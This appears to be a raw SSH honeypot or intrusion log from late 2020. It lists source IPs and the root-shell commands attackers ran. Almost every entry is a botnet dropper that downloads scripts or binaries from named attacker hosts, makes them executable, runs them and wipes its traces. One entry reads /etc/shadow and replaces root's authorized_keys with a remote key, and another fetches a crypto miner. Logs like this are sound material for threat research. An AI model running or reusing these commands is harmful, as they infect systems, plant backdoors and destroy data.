777 yoyobins.sh sh yoyobins.sh tftp 185.243.215.254 -c get yoyotftp1.sh chmod 777 yoyotftp1.sh sh yoyotftp1.sh tftp -r yoyotftp2.sh -g 185.243.215.254 chmod 777 yoyotftp2.sh sh yoyotftp2.sh rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh rm -rf * From 159.203.188.156 8-Nov-2020 02:59:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.95.215.12/Mercury.sh; curl -O http://23.95.215.12/Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp 23.95.215.12 -c get Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp -r Mercury2.sh -g 23.95.215.12; chmod 777 Mercury2.sh; sh Mercury2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 Mercury1.sh Mercury1.sh; sh Mercury1.sh; rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://23.95.215.12/Mercury.sh curl -O http://23.95.215.12/Mercury.sh chmod 777 Mercury.sh sh Mercury.sh tftp 23.95.215.12 -c get Mercury.sh chmod 777 Mercury.sh sh Mercury.sh tftp -r Mercury2.sh -g 23.95.215.12 chmod 777 Mercury2.sh sh Mercury2.sh ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 Mercury1.sh Mercury1.sh sh Mercury1.sh rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh rm -rf * From 171.110.230.134 8-Nov-2020 05:18:51 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://bpsuck.hldns.ru/wget.sh || curl http://bpsuck.hldns.ru/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://bpsuck.hldns.ru/wget.sh || curl http://bpsuck.hldns.ru/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 159.203.188.156 9-Nov-2020 03:17:01 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.95.215.12/8UsA.sh; curl -O http://23.95.215.12/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 23.95.215.12 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 23.95.215.12; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://23.95.215.12/8UsA.sh curl -O http://23.95.215.12/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 23.95.215.12 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 23.95.215.12 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 8UsA1.sh 8UsA1.sh sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 45.153.203.17 9-Nov-2020 08:21:23 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.17/bins/Mercury.x86 -O /tmp/Mercury; chmod +x /tmp/Mercury; /tmp/Mercury Mercury.x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.153.203.17/bins/Mercury.x86 -O /tmp/Mercury chmod +x /tmp/Mercury /tmp/Mercury Mercury.x86 From 165.227.141.136 9-Nov-2020 08:33:12 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://104.168.195.213/Thorbins.sh chmod 777 Thorbins.sh sh Thorbins.sh tftp 104.168.195.213 -c get Thortftp1.sh chmod 777 Thortftp1.sh sh Thortftp1.sh tftp -r Thortftp2.sh -g 104.168.195.213 chmod 777 Thortftp2.sh sh Thortftp2.sh rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh rm -rf * From 51.159.166.212 9-Nov-2020 23:48:24 ssh2 root Exec wget http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) -O- | sh; curl http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) | sh wget http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) -O- | sh curl http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) | sh From 46.249.32.70 10-Nov-2020 07:18:15 ssh2 root Exec wget http://185.172.111.199:10293/bot.x86_64 -O- > /tmp/.f; chmod 777 /tmp/.f; /tmp/.f wget http://185.172.111.199:10293/bot.x86_64 -O- > /tmp/.f chmod 777 /tmp/.f /tmp/.f From 212.129.29.208 10-Nov-2020 10:04:45 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://178.159.36.245/update.sh; curl -O http://178.159.36.245/update.sh; chmod 777 update.sh; sh update.sh; tftp 178.159.36.245 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 178.159.36.245; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 178.159.36.245 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://178.159.36.245/update.sh curl -O http://178.159.36.245/update.sh chmod 777 update.sh sh update.sh tftp 178.159.36.245 -c get update.sh chmod 777 update.sh sh update.sh tftp -r update2.sh -g 178.159.36.245 chmod 777 update2.sh sh update2.sh ftpget -v -u anonymous -p anonymous -P 21 178.159.36.245 update1.sh update1.sh sh update1.sh rm -rf update.sh update.sh update2.sh update1.sh rm -rf * From 67.207.90.208 11-Nov-2020 06:08:00 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.249.32.194/ByeBye.sh; curl -O http://46.249.32.194/ByeBye.sh; chmod 777 ByeBye.sh; sh ByeBye.sh; tftp 46.249.32.194 -c get ByeBye.sh; chmod 777 ByeBye.sh; sh ByeBye.sh; tftp -r ByeBye2.sh -g 46.249.32.194; chmod 777 ByeBye2.sh; sh ByeBye2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.249.32.194 ByeBye1.sh ByeBye1.sh; sh ByeBye1.sh; rm -rf ByeBye.sh ByeBye.sh ByeBye2.sh ByeBye1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://46.249.32.194/ByeBye.sh curl -O http://46.249.32.194/ByeBye.sh chmod 777 ByeBye.sh sh ByeBye.sh tftp 46.249.32.194 -c get ByeBye.sh chmod 777 ByeBye.sh sh ByeBye.sh tftp -r ByeBye2.sh -g 46.249.32.194 chmod 777 ByeBye2.sh sh ByeBye2.sh ftpget -v -u anonymous -p anonymous -P 21 46.249.32.194 ByeBye1.sh ByeBye1.sh sh ByeBye1.sh rm -rf ByeBye.sh ByeBye.sh ByeBye2.sh ByeBye1.sh rm -rf * From 195.58.39.223 12-Nov-2020 08:40:09 ssh2 root Exec wget http://104.168.195.213/Cipher.sh; chmod 777 *; sh Cipher.sh wget http://104.168.195.213/Cipher.sh chmod 777 * sh Cipher.sh From 195.58.39.249 12-Nov-2020 14:42:23 ssh2 root Exec wget http://45.153.203.129/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Roots; rm -rf Astra.* ; history -c wget http://45.153.203.129/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 Roots rm -rf Astra.* history -c From 88.218.16.43 13-Nov-2020 23:25:35 ssh2 root Exec wget http://88.218.16.144/we.sh; curl -O http://88.218.16.144/we.sh; chmod 777 we.sh; sh we.sh wget http://88.218.16.144/we.sh curl -O http://88.218.16.144/we.sh chmod 777 we.sh sh we.sh From 167.172.131.7 14-Nov-2020 01:11:42 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://165.227.161.94/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 165.227.161.94 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c* cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://165.227.161.94/Sakura.sh chmod 777 * sh Sakura.sh tftp -g 165.227.161.94 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c* From 134.209.76.96 14-Nov-2020 19:09:05 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.249.32.194/bins/ByeBye.x86 -O /tmp/ByeBye; chmod +x /tmp/ByeBye; /tmp/ByeBye ByeBye.x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://46.249.32.194/bins/ByeBye.x86 -O /tmp/ByeBye chmod +x /tmp/ByeBye /tmp/ByeBye ByeBye.x86 From 34.125.21.82 14-Nov-2020 21:31:53 ssh2 root Exec nc 1 1; cd /tmp; cat /etc/issue; nc 1 1 cd /tmp cat /etc/issue From 206.81.6.138 15-Nov-2020 19:04:22 ssh2 root Exec wget http://92.42.45.227/bin.sh; chmod +x bin.sh; sh bin.sh wget http://92.42.45.227/bin.sh chmod +x bin.sh sh bin.sh From 206.81.29.232 16-Nov-2020 23:17:13 ssh2 root Exec wget http://198.23.209.128/bin.sh; chmod +x bin.sh; sh bin.sh wget http://198.23.209.128/bin.sh chmod +x bin.sh sh bin.sh Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 142.93.169.123 17-Nov-2020 07:04:00 ssh2 root Exec wget http://198.23.209.128/bin.sh; chmod +x bin.sh; sh bin.sh wget http://198.23.209.128/bin.sh chmod +x bin.sh sh bin.sh From 167.172.38.93 17-Nov-2020 16:33:18 ssh2 root Exec wget http://45.153.203.129/bins/Astra.x32; chmod 777 Astra.x32; ./Astra.x32 Roots.x32; rm -rf Astra.* ; history -c wget http://45.153.203.129/bins/Astra.x32 chmod 777 Astra.x32 ./Astra.x32 Roots.x32 rm -rf Astra.* history -c From 90.255.231.176 18-Nov-2020 19:55:05 ssh2 root ls ll exit From 165.232.45.141 19-Nov-2020 21:27:48 ssh2 root Exec uname -a;nproc uname -a nproc Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 165.232.45.141 19-Nov-2020 21:41:21 ssh2 root Exec uname -a;nproc uname -a nproc Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 68.183.72.81 21-Nov-2020 10:53:40 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.209.128/Beastmode.sh; curl -O http://198.23.209.128/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 198.23.209.128 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 198.23.209.128; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.23.209.128 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://198.23.209.128/Beastmode.sh curl -O http://198.23.209.128/Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp 198.23.209.128 -c get Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp -r Beastmode2.sh -g 198.23.209.128 chmod 777 Beastmode2.sh sh Beastmode2.sh ftpget -v -u anonymous -p anonymous -P 21 198.23.209.128 Beastmode1.sh Beastmode1.sh sh Beastmode1.sh rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh rm -rf * From 161.97.64.180 21-Nov-2020 19:07:59 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec uname -s -v -n -r uname -s -v -n -r From 2.57.122.15 22-Nov-2020 00:11:32 ssh2 root Exec grep 'cpu cores' /proc/cpuinfo | uniq grep 'cpu cores' /proc/cpuinfo | uniq From 167.71.64.214 22-Nov-2020 06:28:36 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.20/bins.sh; curl -O http://37.46.150.20/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.46.150.20/bins.sh curl -O http://37.46.150.20/bins.sh chmod 777 bins.sh sh bins.sh rm -rf * From 218.76.215.4 22-Nov-2020 07:16:32 ssh2 root Exec ping 8.8.8.8 ping 8.8.8.8 Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 161.97.64.180 22-Nov-2020 09:39:04 ssh2 root Exec uname -s -v -n -r uname -s -v -n -r Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 171.223.110.188 22-Nov-2020 18:46:24 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.41.29/wget.sh || curl http://46.246.41.29/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://46.246.41.29/wget.sh || curl http://46.246.41.29/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 167.99.254.185 23-Nov-2020 06:36:55 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.14.224.77/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.77 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.77; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.14.224.77/Percocetbins.sh chmod 777 Percocetbins.sh sh Percocetbins.sh tftp 45.14.224.77 -c get Percocettftp1.sh chmod 777 Percocettftp1.sh sh Percocettftp1.sh tftp -r Percocettftp2.sh -g 45.14.224.77 chmod 777 Percocettftp2.sh sh Percocettftp2.sh rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh rm -rf * From 8.9.15.68 24-Nov-2020 21:48:27 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://5.189.188.163/slumpbins.sh; chmod 777 slumpbins.sh; sh slumpbins.sh; tftp 5.189.188.163 -c get slumptftp1.sh; chmod 777 slumptftp1.sh; sh slumptftp1.sh; tftp -r slumptftp2.sh -g 5.189.188.163; chmod 777 slumptftp2.sh; sh slumptftp2.sh; rm -rf slumpbins.sh slumptftp1.sh slumptftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://5.189.188.163/slumpbins.sh chmod 777 slumpbins.sh sh slumpbins.sh tftp 5.189.188.163 -c get slumptftp1.sh chmod 777 slumptftp1.sh sh slumptftp1.sh tftp -r slumptftp2.sh -g 5.189.188.163 chmod 777 slumptftp2.sh sh slumptftp2.sh rm -rf slumpbins.sh slumptftp1.sh slumptftp2.sh rm -rf * From 157.230.116.109 25-Nov-2020 20:19:18 ssh2 root Exec wget http://198.23.209.128/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; tftp 198.23.209.128 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; tftp -r yttftp2.sh -g 198.23.209.128; chmod 777 yttftp2.sh; sh yttftp2.sh; rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf * wget http://198.23.209.128/ytbins.sh chmod 777 ytbins.sh sh ytbins.sh tftp 198.23.209.128 -c get yttftp1.sh chmod 777 yttftp1.sh sh yttftp1.sh tftp -r yttftp2.sh -g 198.23.209.128 chmod 777 yttftp2.sh sh yttftp2.sh rm -rf ytbins.sh yttftp1.sh yttftp2.sh rm -rf * From 167.71.70.154 26-Nov-2020 21:22:51 ssh2 root Exec rm -rf Astra.x86*; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86; rm -rf Astra.x86 rm -rf Astra.x86* wget http://45.145.185.74/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 rm -rf Astra.x86 From 149.28.165.20 26-Nov-2020 21:37:20 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://208.123.119.159/virginbins.sh; chmod 777 virginbins.sh; sh virginbins.sh; tftp 208.123.119.159 -c get virgintftp1.sh; chmod 777 virgintftp1.sh; sh virgintftp1.sh; tftp -r virgintftp2.sh -g 208.123.119.159; chmod 777 virgintftp2.sh; sh virgintftp2.sh; rm -rf virginbins.sh virgintftp1.sh virgintftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://208.123.119.159/virginbins.sh chmod 777 virginbins.sh sh virginbins.sh tftp 208.123.119.159 -c get virgintftp1.sh chmod 777 virgintftp1.sh sh virgintftp1.sh tftp -r virgintftp2.sh -g 208.123.119.159 chmod 777 virgintftp2.sh sh virgintftp2.sh rm -rf virginbins.sh virgintftp1.sh virgintftp2.sh rm -rf * From 142.93.252.89 26-Nov-2020 23:17:25 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.57.119/sh; curl -O http://107.175.57.119/sh; chmod 777 sh; sh sh; tftp 107.175.57.119 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 107.175.57.119; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.57.119 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.175.57.119/sh curl -O http://107.175.57.119/sh chmod 777 sh sh sh tftp 107.175.57.119 -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r .sh -g 107.175.57.119 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 107.175.57.119 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 103.21.117.92 27-Nov-2020 00:10:07 ssh2 root Exec uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys;wget -qO - http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x uname -a id cat /etc/shadow chattr -ia /root/.ssh/* wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys wget -qO - http://tung-shu.cf/o|perl wget http://tung-shu.cf/x -O /tmp/x chmod +x /tmp/x /tmp/x rm -f /tmp/x From 82.165.236.132 27-Nov-2020 06:55:50 ssh2 root apt-get install postfix service postfix restart yum /etc/init.d/postfix restart From 134.209.249.245 27-Nov-2020 21:34:50 ssh2 root Exec wget http://45.14.224.42/yoyobins.sh; chmod +x yoyobins.sh; sh yoyobins.sh wget http://45.14.224.42/yoyobins.sh chmod +x yoyobins.sh sh yoyobins.sh From 35.246.97.170 28-Nov-2020 18:54:51 ssh2 root Exec cat /etc/issue ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl ; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 sploit.x86; rm -rf Astra.x86; history -c ; wget http://45.145.185.74/bins/Astra.mips; chmod 777 Astra.mips; ./Astra.mips sploit.mips; rm -rf Astra.mips; history -c ; wget http://45.145.185.74/bins/Astra.arm5; chmod 777 Astra.arm5; ./Astra.arm5 sploit.arm5; rm -rf Astra.arm5; history -c ; wget http://45.145.185.74/bins/Astra.arm7; chmod 777 Astra.arm7; ./Astra.arm7 sploit.arm7; rm -rf Astra.arm7; history -c cat /etc/issue wget 119.147.213.57/bot.pl perl bot.pl rm -rf bot.pl curl -O 119.147.213.57/bot.pl perl bot.pl history -c rm -rf bot.pl wget http://45.145.185.74/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 sploit.x86 rm -rf Astra.x86 history -c wget http://45.145.185.74/bins/Astra.mips chmod 777 Astra.mips ./Astra.mips sploit.mips rm -rf Astra.mips history -c wget http://45.145.185.74/bins/Astra.arm5 chmod 777 Astra.arm5 ./Astra.arm5 sploit.arm5 rm -rf Astra.arm5 history -c wget http://45.145.185.74/bins/Astra.arm7 chmod 777 Astra.arm7 ./Astra.arm7 sploit.arm7 rm -rf Astra.arm7 history -c From 195.58.38.220 29-Nov-2020 05:52:43 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 104.168.195.213 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 104.168.195.213; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://104.168.195.213/Heisenbergbins.sh chmod 777 Heisenbergbins.sh sh Heisenbergbins.sh tftp 104.168.195.213 -c get Heisenbergtftp1.sh chmod 777 Heisenbergtftp1.sh sh Heisenbergtftp1.sh tftp -r Heisenbergtftp2.sh -g 104.168.195.213 chmod 777 Heisenbergtftp2.sh sh Heisenbergtftp2.sh rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh rm -rf * From 2.57.122.195 29-Nov-2020 14:21:32 ssh2 root Exec nc 1 1; cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig; nc 1 1 cat /etc/issue wget https://nasapaul.com/cnrig ./cnrig From 188.166.161.246 30-Nov-2020 11:45:23 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.14.224.42/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 45.14.224.42 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 45.14.224.42; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.14.224.42/yoyobins.sh chmod 777 yoyobins.sh sh yoyobins.sh tftp 45.14.224.42 -c get yoyotftp1.sh chmod 777 yoyotftp1.sh sh yoyotftp1.sh tftp -r yoyotftp2.sh -g 45.14.224.42 chmod 777 yoyotftp2.sh sh yoyotftp2.sh rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh rm -rf * From 68.183.223.13 30-Nov-2020 18:25:13 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.14.224.156/Rubybins.sh; chmod 777 Rubybins.sh; sh Rubybins.sh; tftp 45.14.224.156 -c get Rubytftp1.sh; chmod 777 Rubytftp1.sh; sh Rubytftp1.sh; tftp -r Rubytftp2.sh -g 45.14.224.156; chmod 777 Rubytftp2.sh; sh Rubytftp2.sh; rm -rf Rubybins.sh Rubytftp1.sh Rubytftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.14.224.156/Rubybins.sh chmod 777 Rubybins.sh sh Rubybins.sh tftp 45.14.224.156 -c get Rubytftp1.sh chmod 777 Rubytftp1.sh sh Rubytftp1.sh tftp -r Rubytftp2.sh -g 45.14.224.156 chmod 777 Rubytftp2.sh sh Rubytftp2.sh rm -rf Rubybins.sh Rubytftp1.sh Rubytftp2.sh rm -rf * From 174.138.15.222 1-Dec-2020 06:07:00 ssh2 root Exec rm -rf Astra.x86*; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 rm -rf Astra.x86* wget http://45.145.185.74/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 From 46.101.206.127 1-Dec-2020 13:32:01 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://158.69.36.13/ghoul.sh; chmod 777 ghoul.sh; sh ghoul.sh; tftp 158.69.36.13 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 158.69.36.13; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 158.69.36.13 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://158.69.36.13/ghoul.sh chmod 777 ghoul.sh sh ghoul.sh tftp 158.69.36.13 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 158.69.36.13 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 158.69.36.13 ftp1.sh ftp1.sh sh ftp1.sh rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 112.119.28.92 1-Dec-2020 23:44:23 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://10.197.136.1/wget.sh || curl http://10.197.136.1/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://10.197.136.1/wget.sh || curl http://10.197.136.1/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 88.218.16.43 2-Dec-2020 01:02:11 ssh2 root Exec wget http://88.218.16.43/we.sh; curl -O http://88.218.16.43/we.sh; chmod 777 we.sh; sh we.sh wget http://88.218.16.43/we.sh curl -O http://88.218.16.43/we.sh chmod 777 we.sh sh we.sh From 174.138.15.222 2-Dec-2020 02:00:42 ssh2 root Exec rm -rf Astra.x86*; wget http://37.46.150.249/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 rm -rf Astra.x86* wget http://37.46.150.249/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 From 46.101.224.92 2-Dec-2020 04:52:29 ssh2 root Exec wget http://45.14.224.170/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; tftp 45.14.224.170 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; tftp -r yttftp2.sh -g 45.14.224.170; chmod 777 yttftp2.sh; sh yttftp2.sh; rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf * wget http://45.14.224.170/ytbins.sh chmod 777 ytbins.sh sh ytbins.sh tftp 45.14.224.170 -c get yttftp1.sh chmod 777 yttftp1.sh sh yttftp1.sh tftp -r yttftp2.sh -g 45.14.224.170 chmod 777 yttftp2.sh sh yttftp2.sh rm -rf ytbins.sh yttftp1.sh yttftp2.sh rm -rf * From 161.35.152.224 3-Dec-2020 13:00:45 ssh2 root Exec rm -rf Astra.x86*; wget http://37.46.150.185/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 rm -rf Astra.x86* wget http://37.46.150.185/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 From 178.62.231.117 4-Dec-2020 05:15:31 ssh2 root Exec rm -rf Astra.x86*; wget http://192.210.170.111/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 rm -rf Astra.x86* wget http://192.210.170.111/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 From 89.249.73.140 4-Dec-2020 15:19:45 ssh2 root w arp -a last ps -x From 157.245.253.44 4-Dec-2020 16:41:17 ssh2 root Exec cat /etc/issue ; wget 46.249.32.140/bins/Gummy.x86 ; curl -O 46.249.32.140/bins/Gummy.x86 ; chmod 777 Gummy.x86 ; ./Gummy.x86 0day.autoroot.x86 ; wget 46.249.32.140/bins/Gummy.mips ; curl -O 46.249.32.140/bins/Gummy.mips ; chmod 777 Gummy.mips ; ./Gummy.mips otherbinexecxdlmfao ; wget 46.249.32.140/bins/Gummy.arm ; curl -O 46.249.32.140/bins/Gummy.arm ; chmod 777 Gummy.arm ; ./Gummy.arm 0day.autoroot ; wget 46.249.32.140/bins/Gummy.arm5 ; curl -O 46.249.32.140/bins/Gummy.arm5 ; chmod 777 Gummy.arm5 ; ./Gummy.arm5 0day.autoroot ; wget 46.249.32.140/bins/Gummy.arm6 ; curl -O 46.249.32.140/bins/Gummy.arm6 ; chmod 777 Gummy.arm6 ; ./Gummy.arm6 0day.autoroot ; wget 46.249.32.140/bins/Gummy.arm7 ; curl -O 46.249.32.140/bins/Gummy.arm7 ; chmod 777 Gummy.arm7 ; ./Gummy.arm7 0day.autoroot ; wget 46.249.32.140/bins/ ; curl -O 46.249.32.140/bins/ ; chmod 777 ; ./ 0day.autoroot ; wget 46.249.32.140/bins/ ; curl -O 46.249.32.140/bins/ ; chmod 777 ; ./ 0day.autoroot cat /etc/issue wget 46.249.32.140/bins/Gummy.x86 curl -O 46.249.32.140/bins/Gummy.x86 chmod 777 Gummy.x86 ./Gummy.x86 0day.autoroot.x86 wget 46.249.32.140/bins/Gummy.mips curl -O 46.249.32.140/bins/Gummy.mips chmod 777 Gummy.mips ./Gummy.mips otherbinexecxdlmfao wget 46.249.32.140/bins/Gummy.arm curl -O 46.249.32.140/bins/Gummy.arm chmod 777 Gummy.arm ./Gummy.arm 